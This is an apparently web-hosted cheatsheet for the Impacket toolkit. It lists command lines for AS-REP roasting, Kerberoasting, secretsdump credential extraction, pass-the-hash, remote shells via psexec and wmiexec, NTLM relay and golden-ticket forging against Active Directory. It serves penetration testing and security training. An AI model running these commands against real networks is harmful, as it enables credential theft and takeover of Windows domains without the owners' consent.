__ _______________________ _________._________________________ \_ _____/ \______ \ / _ \ / _____/ / _____/ | | \_ _____/ | __) | _/ / /_\ \ / \ ___ / \ ___ | | | __)_ | \ | | \ / | \ \ \_\ \ \ \_\ \ | |___ | \ \___ / |____|_ / \____|__ / \______ / \______ / |_______ \ /_______ / \/ \/ \/ \/ \/ \/ \/

impacket Cheatsheet

← Back to cheatsheets

← Home

Impacket is a collection of Python classes for working with network protocols. Provides tools for SMB, MSRPC, LDAP, Kerberos, and more. Essential for Windows network security testing and Active Directory exploitation.

Common Tools

  • GetNPUsers.py - AS-REP Roasting
  • GetUserSPNs.py - Kerberoasting
  • secretsdump.py - Dump secrets
  • psexec.py - Remote execution
  • smbclient.py - SMB client
  • smbserver.py - SMB server
  • wmiexec.py - WMI execution
  • atexec.py - Task scheduler execution
  • dcomexec.py - DCOM execution
  • lookupsid.py - SID enumeration
  • rpcdump.py - RPC endpoint dump
  • samrdump.py - SAM dump
  • ntlmrelayx.py - NTLM relay
  • ticketConverter.py - Convert tickets
  • ticketer.py - Create tickets

AS-REP Roasting

  • GetNPUsers.py domain/ - List vulnerable users
  • GetNPUsers.py domain/user:pass - Authenticated
  • GetNPUsers.py -dc-ip 10.10.10.10 domain/ - Specify DC
  • GetNPUsers.py -request domain/ - Request tickets
  • GetNPUsers.py -format hashcat domain/ - Hashcat format

Kerberoasting

  • GetUserSPNs.py domain/user:pass - Get SPNs
  • GetUserSPNs.py -dc-ip 10.10.10.10 domain/user:pass - Specify DC
  • GetUserSPNs.py -request domain/user:pass - Request tickets
  • GetUserSPNs.py -outputfile hashes.txt domain/user:pass - Save hashes

Secrets Dumping

  • secretsdump.py domain/user:pass@target - Dump secrets
  • secretsdump.py -hashes :hash domain/user@target - Pass-the-hash
  • secretsdump.py -just-dc domain/user:pass@target - Domain cache
  • secretsdump.py -just-dc-ntlm domain/user:pass@target - NTLM only
  • secretsdump.py -just-dc-user user domain/user:pass@target - Specific user

Remote Execution

  • psexec.py domain/user:pass@target - PsExec
  • wmiexec.py domain/user:pass@target - WMI execution
  • atexec.py domain/user:pass@target - Task scheduler
  • dcomexec.py domain/user:pass@target - DCOM execution
  • smbexec.py domain/user:pass@target - SMB execution

SMB Operations

  • smbclient.py domain/user:pass@target - SMB client
  • smbclient.py -hashes :hash domain/user@target - Pass-the-hash
  • smbserver.py SHARE /path - Start SMB server
  • smbserver.py -username user -password pass SHARE /path - Authenticated

Common Examples

AS-REP Roasting

GetNPUsers.py domain.local/ -dc-ip 10.10.10.10

Find users with pre-auth disabled.

Kerberoasting

GetUserSPNs.py domain.local/user:pass -request

Request service tickets for cracking.

Dump Secrets

secretsdump.py domain.local/user:pass@10.10.10.10

Extract credentials from target.

Pass-the-Hash

psexec.py -hashes :aad3b435b51404ee domain/user@target

Authenticate with hash.

Remote Shell

psexec.py domain/user:pass@target

Get interactive shell.

SMB Client

smbclient.py domain/user:pass@target

Access SMB shares.

NTLM Relay

ntlmrelayx.py -tf targets.txt -smb2support

Relay NTLM authentication.

Create Ticket

ticketer.py -nthash hash -domain-sid SID -domain domain.local administrator

Create golden ticket.

Tips

  • Use GetNPUsers for AS-REP roasting
  • Use GetUserSPNs for Kerberoasting
  • secretsdump is powerful for credential extraction
  • Multiple execution methods available (psexec, wmiexec, etc.)
  • Use -hashes for pass-the-hash attacks
  • Essential for AD security testing
  • Many tools support Kerberos authentication
  • Check documentation for specific protocol details